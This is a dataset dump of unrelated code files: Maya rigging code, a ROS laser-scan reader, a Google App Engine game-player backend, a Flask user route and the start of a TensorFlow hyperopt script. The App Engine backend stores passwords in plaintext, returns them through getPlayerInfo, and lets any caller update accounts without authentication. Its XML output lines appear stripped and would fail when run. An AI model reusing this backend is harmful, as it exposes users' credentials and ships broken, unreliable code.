side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind03.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleY', -1)\n\n # mid translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind03.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt03, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind03.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt03, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n else:\n # left side 03 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind03.control, self.jnt03)\n\n # UPLID LFT\n if self.position_jnt_direction >= 0:\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', 1)\n\n # right side 01 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind01.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # right side 02 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind02.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 04 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind04.control, self.jnt04)\n\n # left side 05 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind05.control, self.jnt05)\n\n else:\n # UPLID RGT\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', -1)\n\n # right side 01 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind01.control, self.jnt01)\n\n # right side 02 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind02.control, self.jnt02)\n\n # left side 04 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind04.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 05 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind05.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n self.drive_ctrl_grp = drive_ctrl_grp\n self.controller_bind01 = controller_bind01.control\n self.controller_bind01_grp = controller_bind01.parent_control[0]\n\n self.controller_bind05 = controller_bind05.control\n self.controller_bind05_grp = controller_bind05.parent_control[0]\n\n self.controller_bind03 = controller_bind03.control\n self.controller_bind03_grp = controller_bind03.parent_control[0]\n\n # CONNECT OFFSET BIND TO CTRL BIND\n rt_utils.connect_attr_translate(self.joint_bind01_grp_offset, controller_bind01.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind02_grp_offset, controller_bind02.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind03_grp_offset, controller_bind03.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind04_grp_offset, controller_bind04.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind05_grp_offset, controller_bind05.parent_control[1])\n\n def wire_bind_curve(self, curve, offset_jnt02_bind_position, offset_jnt04_bind_position, ctrl01_direction,\n ctrl02_direction,\n ctrl03_direction, ctrl04_direction, ctrl05_direction, scale, side=''):\n length_joint_position = len(self.all_joint)\n\n # query position of bind joint\n joint01 = self.all_joint[(length_joint_position * 0)]\n\n joint02 = self.all_joint[int((length_joint_position / 4) + offset_jnt02_bind_position)]\n\n if not len(self.all_joint) % 2 == 0:\n joint03 = self.all_joint[int(length_joint_position / 2)]\n self.xform_jnt03 = cmds.xform(joint03, ws=1, q=1, t=1)\n\n else:\n temp_jnt03 = self.all_joint[int(length_joint_position / 2)]\n temps_joint03 = self.all_joint[int(length_joint_position / 2) - 1]\n transform = cmds.createNode('transform', n='guide')\n joint03 = cmds.delete(cmds.parentConstraint(temp_jnt03, temps_joint03, transform))\n self.xform_jnt03 = cmds.xform(joint03, ws=1, q=1, t=1)\n cmds.delete(transform)\n\n joint04 = self.all_joint[\n int((((length_joint_position / 2) + (length_joint_position / 4)) - offset_jnt04_bind_position) + 1)]\n joint05 = self.all_joint[-1]\n\n # query the position right side\n self.xform_jnt01 = cmds.xform(joint01, ws=1, q=1, t=1)\n self.xform_jnt02 = cmds.xform(joint02, ws=1, q=1, t=1)\n self.xform_jnt04 = cmds.xform(joint04, ws=1, q=1, t=1)\n self.xform_jnt05 = cmds.xform(joint05, ws=1, q=1, t=1)\n # mc.delete(transform)\n\n cmds.select(cl=1)\n self.jnt01 = cmds.joint(n=rt_utils.prefix_name(self.prefix_name_crv) + '01' + side + '_driver',\n p=self.xform_jnt01, rad=0.5 * scale)\n self.jnt02 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '02' + side + '_driver')[\n 0]\n self.jnt03 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '03' + side + '_driver')[\n 0]\n self.jnt04 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '04' + side + '_driver')[\n 0]\n self.jnt05 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '05' + side + '_driver')[\n 0]\n\n # set the position RGT joint\n cmds.xform(self.jnt02, ws=1, t=self.xform_jnt02)\n cmds.xform(self.jnt03, ws=1, t=self.xform_jnt03)\n cmds.xform(self.jnt04, ws=1, t=self.xform_jnt04)\n cmds.xform(self.jnt05, ws=1, t=self.xform_jnt05)\n\n # create bind curve\n deform_curve = cmds.duplicate(curve)[0]\n\n deform_curve = cmds.rename(deform_curve,\n (rt_utils.prefix_name(self.prefix_name_crv) + 'Driver' + side + '_crv'))\n\n # parent the bind joint\n joint_bind03_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset'], object=self.jnt03,\n match_position=self.jnt03,\n prefix=self.prefix_name_crv + 'Drv03',\n suffix='_driver', side=side)\n\n joint_bind05_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset', 'All', 'Corner'],\n object=self.jnt05,\n match_position=self.jnt05,\n prefix=self.prefix_name_crv + 'Drv05',\n suffix='_driver', side=side)\n\n joint_bind04_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset'], object=self.jnt04,\n match_position=self.jnt04,\n prefix=self.prefix_name_crv + 'Drv04',\n suffix='_driver', side=side)\n\n joint_bind01_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset', 'All', 'Corner'],\n object=self.jnt01,\n match_position=self.jnt01,\n prefix=self.prefix_name_crv + 'Drv01',\n suffix='_driver', side=side)\n\n joint_bind02_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset'], object=self.jnt02,\n match_position=self.jnt02,\n prefix=self.prefix_name_crv + 'Drv02',\n suffix='_driver', side=side)\n\n if self.position_jnt_direction > 0:\n cmds.setAttr(joint_bind01_grp[0] + '.rotateY', ctrl01_direction * -1)\n cmds.setAttr(joint_bind02_grp[0] + '.rotateY', ctrl02_direction * -1)\n cmds.setAttr(joint_bind03_grp[0] + '.rotateY', ctrl03_direction)\n cmds.setAttr(joint_bind05_grp[0] + '.rotateY', ctrl05_direction)\n cmds.setAttr(joint_bind04_grp[0] + '.rotateY', ctrl04_direction)\n\n else:\n cmds.setAttr(joint_bind01_grp[0] + '.rotateY', ctrl01_direction)\n cmds.setAttr(joint_bind02_grp[0] + '.rotateY', ctrl02_direction)\n cmds.setAttr(joint_bind03_grp[0] + '.rotateY', ctrl03_direction * -1)\n cmds.setAttr(joint_bind05_grp[0] + '.rotateY', ctrl05_direction * -1)\n cmds.setAttr(joint_bind04_grp[0] + '.rotateY', ctrl04_direction * -1)\n\n # rebuild the curve\n cmds.rebuildCurve(deform_curve, rpo=1, rt=0, end=1, kr=0, kcp=0,\n kep=1, kt=0, s=8, d=3, tol=0.01)\n\n # skinning the joint to the bind curve\n skin_cluster = cmds.skinCluster([self.jnt05, self.jnt04, self.jnt01, self.jnt02, self.jnt03], deform_curve,\n n='%s%s%s%s' % (\n rt_utils.prefix_name(self.prefix_name_crv), 'Wire', side, 'SkinCluster'),\n tsb=True,\n bm=0, sm=0, nw=1, mi=3)\n\n # Distribute the skin\n skin_percent_index0 = '%s.cv[0]' % deform_curve\n skin_percent_index1 = '%s.cv[1]' % deform_curve\n skin_percent_index2 = '%s.cv[2]' % deform_curve\n skin_percent_index3 = '%s.cv[3]' % deform_curve\n skin_percent_index4 = '%s.cv[4]' % deform_curve\n skin_percent_index5 = '%s.cv[5]' % deform_curve\n skin_percent_index6 = '%s.cv[6]' % deform_curve\n skin_percent_index7 = '%s.cv[7]' % deform_curve\n skin_percent_index8 = '%s.cv[8]' % deform_curve\n skin_percent_index9 = '%s.cv[9]' % deform_curve\n skin_percent_index10 = '%s.cv[10]' % deform_curve\n\n cmds.skinPercent(skin_cluster[0], skin_percent_index0, tv=[(self.jnt01, 1.0)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index1, tv=[(self.jnt01, 0.9), (self.jnt02, 0.1)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index2, tv=[(self.jnt01, 0.7), (self.jnt02, 0.3)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index3,\n tv=[(self.jnt02, 0.5), (self.jnt01, 0.25), (self.jnt03, 0.25)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index4, tv=[(self.jnt02, 0.3), (self.jnt03, 0.7)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index5, tv=[(self.jnt03, 1.0)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index6, tv=[(self.jnt04, 0.3), (self.jnt03, 0.7)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index7,\n tv=[(self.jnt04, 0.5), (self.jnt05, 0.25), (self.jnt03, 0.25)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index8, tv=[(self.jnt05, 0.7), (self.jnt04, 0.3)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index9, tv=[(self.jnt05, 0.9), (self.jnt04, 0.1)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index10, tv=[(self.jnt05, 1.0)])\n\n # wire the curve\n wire_deformer = cmds.wire(curve, dds=(0, 100 * scale), wire=deform_curve)\n wire_deformer[0] = cmds.rename(wire_deformer[0],\n (rt_utils.prefix_name(self.prefix_name_crv) + side + '_wireNode'))\n cmds.setAttr(wire_deformer[0] + '.scale[0]', 0)\n\n # constraint mid to 02 left and right\n jnt02_bind_constraint_grp = cmds.parentConstraint(self.jnt03, self.jnt01, joint_bind02_grp[0], mo=1)\n jnt04_bind_constraint_grp = cmds.parentConstraint(self.jnt03, self.jnt05, joint_bind04_grp[0], mo=1)\n\n # rename constraint\n rt_utils.constraint_rename([jnt02_bind_constraint_grp[0], jnt04_bind_constraint_grp[0]])\n\n # create grp curves\n curves_grp = cmds.createNode('transform', n=self.prefix_name_crv + 'Crv' + side + '_grp')\n cmds.setAttr(curves_grp + '.it', 0, l=1)\n cmds.parent(deform_curve, cmds.listConnections(wire_deformer[0] + '.baseWire[0]')[0], curves_grp)\n cmds.hide(curves_grp)\n\n # create grp bind\n bind_jnt_grp = cmds.createNode('transform', n=self.prefix_name_crv + 'JntDriver' + side + '_grp')\n cmds.parent(joint_bind03_grp[0], joint_bind05_grp[0], joint_bind04_grp[0],\n joint_bind01_grp[0], joint_bind02_grp[0], bind_jnt_grp)\n cmds.hide(bind_jnt_grp)\n\n self.joint_bind04_grp = joint_bind04_grp[0]\n self.joint_bind02_grp = joint_bind02_grp[0]\n self.joint_bind05_grp_all = joint_bind05_grp[2]\n self.joint_bind01_grp_all = joint_bind01_grp[2]\n self.joint_bind05_grp = joint_bind05_grp[0]\n self.joint_bind01_grp = joint_bind01_grp[0]\n self.joint_bind03_grp = joint_bind03_grp[0]\n\n self.joint_bind04_grp_offset = joint_bind04_grp[1]\n self.joint_bind02_grp_offset = joint_bind02_grp[1]\n self.joint_bind05_grp_offset = joint_bind05_grp[1]\n self.joint_bind01_grp_offset = joint_bind01_grp[1]\n self.joint_bind03_grp_offset = joint_bind03_grp[1]\n\n self.joint_bind01_grp_corner = joint_bind01_grp[3]\n self.joint_bind05_grp_corner = joint_bind05_grp[3]\n\n self.curves_grp = curves_grp\n self.bind_jnt_grp = bind_jnt_grp\n\n def create_joint_wire(self, curve, side, scale, game_bind_joint, parent_sgame_joint):\n\n curve_vetex = cmds.ls('%s.cv[0:*]' % curve, fl=True)\n\n self.all_joint = []\n self.locator_grp_offset = []\n self.locator_grp_zro = []\n self.all_skin = []\n self.joint_grp_zro = []\n\n for index, object in enumerate(curve_vetex):\n # create joint\n cmds.select(cl=1)\n joint = cmds.joint(n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_skn'), rad=0.1 * scale)\n if game_bind_joint:\n joint_bind = cmds.joint(n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_bind'),\n rad=0.1 * scale)\n constraining = rt_utils.parent_scale_constraint(joint, joint_bind)\n cmds.parent(joint_bind, parent_sgame_joint)\n cmds.parent(constraining[0], constraining[1], 'additional_grp')\n cmds.setAttr(joint_bind + '.segmentScaleCompensate', 0)\n\n postion_object = cmds.xform(object, q=1, ws=1, t=1)\n cmds.xform(joint, ws=1, t=postion_object)\n self.all_joint.append(joint)\n\n joint_grp = rlu_transform.create_parent_transform(parent_list=[''], object=joint,\n match_position=joint,\n prefix=self.prefix_name_crv + str(index + 1).zfill(2),\n suffix='_jnt', side=side)\n\n self.joint_grp_zro.append(joint_grp[0])\n # create locator\n # locator = mc.spaceLocator(n='%s%02d%s%s' % (self.prefixNameCrv, (i + 1), side, '_loc'))[0]\n group_offset = \\\n cmds.spaceLocator(n='%s%s%02d%s%s' % (self.prefix_name_crv, 'Offset', (index + 1), side, '_loc'))[0]\n cmds.hide(group_offset)\n\n cmds.xform(group_offset, ws=1, t=postion_object)\n locator_grp = rlu_transform.create_parent_transform(parent_list=[''], object=group_offset,\n match_position=group_offset,\n prefix=self.prefix_name_crv + str(index + 1).zfill(2),\n suffix='_zro', side=side)\n self.locator_grp_offset.append(group_offset)\n self.locator_grp_zro.append(locator_grp[0])\n # self.allLocator.append(groupOffset)\n\n # connect curve to locator grp\n curve_list_relatives = cmds.listRelatives(curve, s=True)[0]\n uParam = rlu_core.get_uParam(postion_object, curve_list_relatives)\n pci_node = cmds.createNode(\"pointOnCurveInfo\",\n n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_pci'))\n cmds.connectAttr(curve_list_relatives + '.worldSpace', pci_node + '.inputCurve')\n cmds.setAttr(pci_node + '.parameter', uParam)\n cmds.connectAttr(pci_node + '.position', locator_grp[0] + '.t')\n\n decompose_node = cmds.createNode('decomposeMatrix',\n n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_dmtx'))\n cmds.connectAttr(group_offset + '.worldMatrix[0]', decompose_node + '.inputMatrix')\n\n cmds.connectAttr(decompose_node + '.outputTranslate', joint_grp[0] + '.translate')\n cmds.connectAttr(decompose_node + '.outputRotate', joint_grp[0] + '.rotate')\n\n # grouping joint\n self.joint_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Jnt' + side + '_grp')\n cmds.parent(self.joint_grp_zro, self.joint_grp)\n\n # grouping locator\n self.locator_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Loc' + side + '_grp')\n cmds.setAttr(self.locator_grp + '.it', 0, l=1)\n cmds.parent(self.locator_grp_zro, self.locator_grp)\n","sub_path":"rigging/library/base/face/wire.py","file_name":"wire.py","file_ext":"py","file_size_in_byte":36962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"106530438","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nimport numpy as np\n\nglobal MIN_SCAN_ANGLE_RAD\nglobal MAX_SCAN_ANGLE_RAD\nglobal TURN_SPEED_MPS\nMIN_SCAN_ANGLE_RAD = (-90.0) / 180.0 * np.pi\nMAX_SCAN_ANGLE_RAD = (+90.0) / 180.0 * np.pi\nTURN_SPEED_MPS = 1.57\n\ndef callback(scan_msg):\n minIndex = np.ceil((MIN_SCAN_ANGLE_RAD - scan_msg.angle_min) / scan_msg.angle_increment)\n maxIndex = np.floor((MAX_SCAN_ANGLE_RAD - scan_msg.angle_min)/ scan_msg.angle_increment)\n midIndex = (minIndex+maxIndex)/2\n #print(maxIndex)\n closestRange_left=scan_msg.ranges[int(minIndex)]\n print(closestRange_left)\n\nrospy.init_node('scan_values')\nsub = rospy.Subscriber('scan', LaserScan, callback)\nrospy.spin()\n\nif __name__ == '__main__':\n callback()\n","sub_path":"lds_test/lds_test01.py","file_name":"lds_test01.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"132883865","text":"from google.appengine.ext import ndb\n\nimport webapp2\n\nclass PlayerDB(ndb.Model):\n id = ndb.StringProperty()\n password = ndb.StringProperty()\n score = ndb.IntegerProperty()\n soft_cash = ndb.IntegerProperty()\n hard_cash = ndb.IntegerProperty()\n equipment = ndb.IntegerProperty()\n item = ndb.IntegerProperty()\n buying_equipment_eye = ndb.IntegerProperty()\n buying_equipment_body = ndb.IntegerProperty()\n buying_equipment_mouth = ndb.IntegerProperty()\n buying_equipment_fin = ndb.IntegerProperty()\n hp_lv = ndb.IntegerProperty()\n #scale_lv = ndb.IntegerProperty()\n speed_lv = ndb.IntegerProperty()\n fever_lv = ndb.IntegerProperty()\n nick_name = ndb.StringProperty()\n exp_lv = ndb.IntegerProperty()\n exp_sub = ndb.IntegerProperty()\n \nclass MainPage(webapp2.RequestHandler):\n def login(self):\n id = self.request.get('id') \n password = self.request.get('password')\n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.id == id)\n #qry = qry.filter(PlayerDB.password == password)\n playerDBList = qry.fetch(1)\n isExistID = False\n isEqualPS = False\n for playerDBele in playerDBList:\n if(playerDBele.id == id):\n isExistID = True\n if(playerDBele.password == password):\n isEqualPS = True\n break\n if(isExistID and isEqualPS):\n self.response.write('ok')\n else:\n if(isExistID == False):\n self.response.write('fail : ID not Existed') \n elif(isEqualPS == False):\n self.response.write('fail : PS is wrong') \n \n def isExistedID(self):\n id = self.request.get('id') \n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.id == id)\n playerDBs = qry.fetch(1)\n isExistID = False\n for playerDBchd in playerDBs:\n if(playerDBchd.id == id):\n isExistID = True\n break\n return isExistID\n \n def create(self):\n isExistID = self.isExistedID()\n \n if(isExistID == False):\n playerDB = PlayerDB(parent = ndb.Key('Group', 'Profile'))\n playerDB.id = self.request.get('id')\n playerDB.password = self.request.get('password')\n \n score = self.request.get('score')\n playerDB.score = int(score)\n \n soft_cash = self.request.get('soft_cash')\n playerDB.soft_cash = int(soft_cash)\n \n hard_cash = self.request.get('hard_cash')\n playerDB.hard_cash = int(hard_cash)\n \n equipment = self.request.get('equipment')\n playerDB.equipment = int(equipment)\n \n item = self.request.get('item')\n playerDB.item = int(item)\n \n buying_equipment_eye = self.request.get('buying_equipment_eye')\n playerDB.buying_equipment_eye = int(buying_equipment_eye)\n \n buying_equipment_body = self.request.get('buying_equipment_body')\n playerDB.buying_equipment_body = int(buying_equipment_body)\n \n buying_equipment_mouth = self.request.get('buying_equipment_mouth')\n playerDB.buying_equipment_mouth = int(buying_equipment_mouth)\n \n buying_equipment_fin = self.request.get('buying_equipment_fin')\n playerDB.buying_equipment_fin = int(buying_equipment_fin)\n \n hp_lv = self.request.get('hp_lv')\n playerDB.hp_lv = int(hp_lv)\n \n #scale_lv = self.request.get('scale_lv')\n #playerDB.scale_lv = int(scale_lv)\n \n speed_lv = self.request.get('speed_lv')\n playerDB.speed_lv = int(speed_lv)\n \n fever_lv = self.request.get('fever_lv')\n playerDB.fever_lv = int(fever_lv)\n \n nick_name = self.request.get('nick_name')\n playerDB.nick_name = nick_name\n \n exp_lv = self.request.get('exp_lv')\n playerDB.exp_lv = int(exp_lv)\n \n exp_sub = self.request.get('exp_sub')\n playerDB.exp_sub = int(exp_sub)\n \n playerDB.put()\n \n self.response.write('ok')\n else:\n self.response.write('fail : ID Duplicated')\n \n \n def update(self):\n isExistID = self.isExistedID()\n if(isExistID == True):\n id = self.request.get('id') \n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.id == id)\n playerDBs = qry.fetch(1)\n for playerDBchd in playerDBs:\n score = self.request.get('score')\n int_score = int(score)\n if(int_score != -1):\n playerDBchd.score = int_score\n \n soft_cash = self.request.get('soft_cash')\n int_soft_cach = int(soft_cash)\n if(int_soft_cach != -1):\n playerDBchd.soft_cash = int_soft_cach\n \n hard_cash = self.request.get('hard_cash')\n int_hard_cash = int(hard_cash)\n if(int_hard_cash != -1):\n playerDBchd.hard_cash = int_hard_cash\n \n equipment = self.request.get('equipment')\n int_equipment = int(equipment)\n if(int_equipment != -1):\n playerDBchd.equipment = int_equipment\n \n item = self.request.get('item')\n int_item = int(item)\n if(int_item != -1):\n playerDBchd.item = int_item\n \n password = self.request.get('password')\n if(password != 'null'):\n playerDBchd.password = password\n \n buying_equipment_eye = self.request.get('buying_equipment_eye')\n int_buying_equipment_eye = int(buying_equipment_eye)\n if(int_buying_equipment_eye != -1):\n playerDBchd.buying_equipment_eye = int_buying_equipment_eye\n \n buying_equipment_body = self.request.get('buying_equipment_body')\n int_buying_equipment_body = int(buying_equipment_body)\n if(int_buying_equipment_body != -1):\n playerDBchd.buying_equipment_body = int_buying_equipment_body\n \n buying_equipment_mouth = self.request.get('buying_equipment_mouth')\n int_buying_equipment_mouth = int(buying_equipment_mouth)\n if(int_buying_equipment_mouth != -1):\n playerDBchd.buying_equipment_mouth = int_buying_equipment_mouth\n \n buying_equipment_fin = self.request.get('buying_equipment_fin')\n int_buying_equipment_fin = int(buying_equipment_fin)\n if(int_buying_equipment_fin != -1):\n playerDBchd.buying_equipment_fin = int_buying_equipment_fin\n \n hp_lv = self.request.get('hp_lv')\n int_hp_lv = int(hp_lv)\n if(int_hp_lv != -1):\n playerDBchd.hp_lv = int_hp_lv\n \n #scale_lv = self.request.get('scale_lv')\n #int_scale_lv = int(scale_lv)\n #if(int_scale_lv != -1):\n # playerDBchd.scale_lv = int_scale_lv\n \n speed_lv = self.request.get('speed_lv')\n int_speed_lv = int(speed_lv)\n if(int_speed_lv != -1):\n playerDBchd.speed_lv = int_speed_lv\n \n fever_lv = self.request.get('fever_lv')\n int_fever_lv = int(fever_lv)\n if(int_fever_lv != -1):\n playerDBchd.fever_lv = int_fever_lv\n \n nick_name = self.request.get('nick_name')\n if(nick_name != 'null'):\n playerDBchd.nick_name = nick_name\n \n exp_lv = self.request.get('exp_lv')\n int_exp_lv = int(exp_lv)\n if(int_exp_lv != -1):\n playerDBchd.exp_lv = int_exp_lv\n \n exp_sub = self.request.get('exp_sub')\n int_exp_sub = int(exp_sub)\n if(int_exp_sub != -1):\n playerDBchd.exp_sub = int_exp_sub\n \n playerDBchd.put()\n break\n self.response.write('ok')\n else:\n self.response.write('fail : ID not Existed')\n \n def getRankingList(self):\n isExistID = self.isExistedID()\n if(isExistID == True):\n id = self.request.get('id') \n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.id == id)\n playerDBs = qry.fetch(1)\n playerScore = 0\n for playerDBchd in playerDBs:\n playerScore = playerDBchd.score\n break\n \n listCount = self.request.get('count')\n int_listCount = int(listCount)\n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.score >= playerScore).order(-PlayerDB.score)\n playerDBs = qry.fetch()\n counter = 1\n playerRanking = 0\n \n self.response.write('\\n')\n self.response.write('\\n')\n for playerDBchd in playerDBs:\n if(counter <= int_listCount):\n self.response.write(' \\n' % (counter, playerDBchd.id, playerDBchd.score))\n if(playerScore == playerDBchd.score):\n playerRanking = counter\n counter += 1\n if(counter-1 < int_listCount):\n restCount = int_listCount - counter + 1\n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.score < playerScore).order(-PlayerDB.score)\n playerDBs = qry.fetch(restCount)\n for playerDBchd in playerDBs:\n self.response.write(' \\n' % (counter, playerDBchd.id, playerDBchd.score))\n counter += 1\n self.response.write(' \\n' % (playerRanking, id, playerScore))\n self.response.write('\\n')\n else:\n self.response.write('\\n')\n self.response.write('\\n')\n self.response.write('\\n')\n\n def getPlayerInfo(self):\n isExistID = self.isExistedID()\n if(isExistID == True):\n id = self.request.get('id') \n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.id == id)\n playerDBs = qry.fetch(1)\n self.response.write('\\n')\n self.response.write('\\n')\n for playerDBchd in playerDBs:\n self.response.write(' \\n' % (playerDBchd.id, playerDBchd.password, playerDBchd.score, playerDBchd.soft_cash, playerDBchd.hard_cash, playerDBchd.equipment, playerDBchd.item, playerDBchd.buying_equipment_eye, playerDBchd.buying_equipment_body, playerDBchd.buying_equipment_mouth, playerDBchd.buying_equipment_fin, playerDBchd.hp_lv, playerDBchd.speed_lv, playerDBchd.fever_lv, playerDBchd.nick_name, playerDBchd.exp_lv, playerDBchd.exp_sub))\n break\n self.response.write('\\n')\n else:\n self.response.write('\\n')\n self.response.write('\\n')\n self.response.write('\\n')\n\n def post(self):\n action = self.request.get('action')\n if(action == 'login'):\n self.login()\n elif(action == 'create'):\n self.create()\n elif(action == 'update'):\n self.update()\n elif(action == 'getRankingList'):\n self.getRankingList()\n elif(action == 'getPlayerInfo'):\n self.getPlayerInfo()\n \napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"269898269","text":"from flask import Blueprint\nfrom user.user_helpers import get_user_by_id\n\nuser = Blueprint(\"user\", __name__)\n\n\n@user.route(\"/\")\ndef user_info(user_id):\n user = get_user_by_id(user_id)\n\n if user:\n return {\n \"error\": False,\n \"message\": \"User Found!\",\n \"payload\": {\n \"user\": {\"id\": user[\"id\"], \"name\": user[\"name\"], \"email\": user[\"email\"]}\n },\n }\n else:\n return {\"error\": True, \"message\": \"User Not Found!\"}\n\n","sub_path":"submissions/sm_001_aalind/week_19/day_4/session_1/backend/user/blueprint_user.py","file_name":"blueprint_user.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"186612255","text":"import tensorflow as tf\n\nfrom hyperopt import fmin, tpe, hp, STATUS_OK, Trials\nfrom hyperopt import hp\n\nfrom residual_block import stack_block\n\nimport csv, pickle, traceback\n\nfrom sklearn.metrics import accuracy_score\n\ntrain_directory = \"../dataset_normalized/training_set\"\ntest_directory = \"../dataset_normalized/validation_set\"\n\ntrain_gen = tf.keras.preprocessing.image_dataset_from_directory(\n train_directory,\n labels=\"inferred\",\n label_mode=\"categorical\",\n batch_size=3,\n image_size=(355, 370),\n validation_split=0.2,\n seed=2222,\n subset=\"training\",\n)\n\nvalid_gen = tf.keras.preprocessing.image_dataset_from_directory(\n train_directory,\n labels=\"inferred\",\n label_mode=\"categorical\",\n batch_size=8,\n image_size=(355, 370),\n validation_split=0.2,\n seed=2222,\n subset=\"validation\",\n)\n\ntest_gen = tf.keras.preprocessing.image_dataset_from_directory(\n test_directory,\n labels=\"inferred\",\n label_mode=\"categorical\",\n batch_size=8,\n image_size=(355, 370)\n)\n\ndef pooling_choice(tensor, pooling_type: str):\n\n if pooling_type == \"glob_avg\":\n tensor = 